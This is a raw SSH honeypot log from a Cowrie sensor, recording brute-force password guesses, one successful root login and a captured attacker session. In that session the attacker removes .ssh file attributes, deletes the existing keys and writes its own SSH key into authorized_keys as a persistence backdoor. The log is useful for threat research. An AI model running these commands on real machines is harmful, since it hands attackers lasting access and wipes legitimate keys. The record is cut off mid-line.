{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54464,"dst_ip":"1.2.3.4","dst_port":22,"session":"ade0e9a0b197","protocol":"ssh","message":"New connection: 212.227.235.229:54464 (1.2.3.4:22) [session: ade0e9a0b197]","sensor":"my-vps","timestamp":"2025-09-08T13:57:06.750544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:57:06.751535Z","src_ip":"212.227.235.229","session":"ade0e9a0b197"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:57:06.880930Z","src_ip":"212.227.235.229","session":"ade0e9a0b197"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:57:06.968857Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:57:06.969550Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:57:06.970691Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:07.236925Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"password1","message":"login attempt [hadoop/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:57:07.438115Z","src_ip":"212.227.235.229","session":"ade0e9a0b197"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:07.583107Z","src_ip":"134.199.174.250","session":"975c573bc4e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:57:07.792155Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:57:07.792849Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:57:08.059228Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:08.060236Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":26971,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec174ab3d420","protocol":"ssh","message":"New connection: 49.247.35.31:26971 (1.2.3.4:22) [session: ec174ab3d420]","sensor":"my-vps","timestamp":"2025-09-08T13:57:08.341801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:57:08.343214Z","src_ip":"49.247.35.31","session":"ec174ab3d420"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:08.569149Z","src_ip":"212.227.235.229","session":"ade0e9a0b197"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:57:08.625650Z","src_ip":"49.247.35.31","session":"ec174ab3d420"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:57:09.802215Z","src_ip":"49.247.35.31","session":"ec174ab3d420"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:11.117032Z","src_ip":"49.247.35.31","session":"ec174ab3d420"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":17295,"dst_ip":"1.2.3.4","dst_port":22,"session":"14a0eced6283","protocol":"ssh","message":"New connection: 49.247.35.31:17295 (1.2.3.4:22) [session: 14a0eced6283]","sensor":"my-vps","timestamp":"2025-09-08T13:57:11.376498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:57:11.381833Z","src_ip":"49.247.35.31","session":"14a0eced6283"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:57:11.656435Z","src_ip":"49.247.35.31","session":"14a0eced6283"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:57:12.722868Z","src_ip":"49.247.35.31","session":"14a0eced6283"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:13.015789Z","src_ip":"49.247.35.31","session":"d4b72967f557"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:13.016747Z","src_ip":"49.247.35.31","session":"14a0eced6283"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":57154,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a3eb75b9904","protocol":"ssh","message":"New connection: 134.199.174.250:57154 (1.2.3.4:22) [session: 2a3eb75b9904]","sensor":"my-vps","timestamp":"2025-09-08T13:57:34.634376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:57:34.635100Z","src_ip":"134.199.174.250","session":"2a3eb75b9904"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:57:34.935733Z","src_ip":"134.199.174.250","session":"2a3eb75b9904"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"123abc","message":"login attempt [webmaster/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:57:35.829637Z","src_ip":"134.199.174.250","session":"2a3eb75b9904"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:37.131665Z","src_ip":"134.199.174.250","session":"2a3eb75b9904"}
{"eventid":"cowrie.session.closed","duration":"301.0","message":"Connection lost after 301.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:44.279922Z","src_ip":"49.64.85.138","session":"291173da77cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44798,"dst_ip":"1.2.3.4","dst_port":22,"session":"279c5a56c18a","protocol":"ssh","message":"New connection: 212.227.235.229:44798 (1.2.3.4:22) [session: 279c5a56c18a]","sensor":"my-vps","timestamp":"2025-09-08T13:57:44.497106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:57:44.502480Z","src_ip":"212.227.235.229","session":"279c5a56c18a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:57:44.726337Z","src_ip":"212.227.235.229","session":"279c5a56c18a"}
{"eventid":"cowrie.login.failed","username":"teamspeak","password":"ts","message":"login attempt [teamspeak/ts] failed","sensor":"my-vps","timestamp":"2025-09-08T13:57:45.624367Z","src_ip":"212.227.235.229","session":"279c5a56c18a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:46.862164Z","src_ip":"212.227.235.229","session":"279c5a56c18a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60496,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe3ceb22c72f","protocol":"ssh","message":"New connection: 212.227.235.229:60496 (1.2.3.4:22) [session: fe3ceb22c72f]","sensor":"my-vps","timestamp":"2025-09-08T13:57:51.250742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:57:51.252088Z","src_ip":"212.227.235.229","session":"fe3ceb22c72f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:57:51.359949Z","src_ip":"212.227.235.229","session":"fe3ceb22c72f"}
{"eventid":"cowrie.login.failed","username":"samsung","password":"samsung2025","message":"login attempt [samsung/samsung2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:57:51.880079Z","src_ip":"212.227.235.229","session":"fe3ceb22c72f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:57:53.034535Z","src_ip":"212.227.235.229","session":"fe3ceb22c72f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":55390,"dst_ip":"1.2.3.4","dst_port":22,"session":"a30c29c1f391","protocol":"ssh","message":"New connection: 134.199.174.250:55390 (1.2.3.4:22) [session: a30c29c1f391]","sensor":"my-vps","timestamp":"2025-09-08T13:58:04.890726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:58:04.891744Z","src_ip":"134.199.174.250","session":"a30c29c1f391"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:58:05.189466Z","src_ip":"134.199.174.250","session":"a30c29c1f391"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"1234567890","message":"login attempt [nagios/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:58:06.087651Z","src_ip":"134.199.174.250","session":"a30c29c1f391"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:58:07.401493Z","src_ip":"134.199.174.250","session":"a30c29c1f391"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57054,"dst_ip":"1.2.3.4","dst_port":22,"session":"d32bd96575d3","protocol":"ssh","message":"New connection: 212.227.235.229:57054 (1.2.3.4:22) [session: d32bd96575d3]","sensor":"my-vps","timestamp":"2025-09-08T13:58:14.278225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:58:14.279131Z","src_ip":"212.227.235.229","session":"d32bd96575d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:58:14.410167Z","src_ip":"212.227.235.229","session":"d32bd96575d3"}
{"eventid":"cowrie.login.failed","username":"kafka","password":"123","message":"login attempt [kafka/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:58:14.973626Z","src_ip":"212.227.235.229","session":"d32bd96575d3"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:58:16.107263Z","src_ip":"212.227.235.229","session":"d32bd96575d3"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":23766,"dst_ip":"1.2.3.4","dst_port":22,"session":"bccc6387f14d","protocol":"ssh","message":"New connection: 49.247.35.31:23766 (1.2.3.4:22) [session: bccc6387f14d]","sensor":"my-vps","timestamp":"2025-09-08T13:58:22.594511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:58:22.597031Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed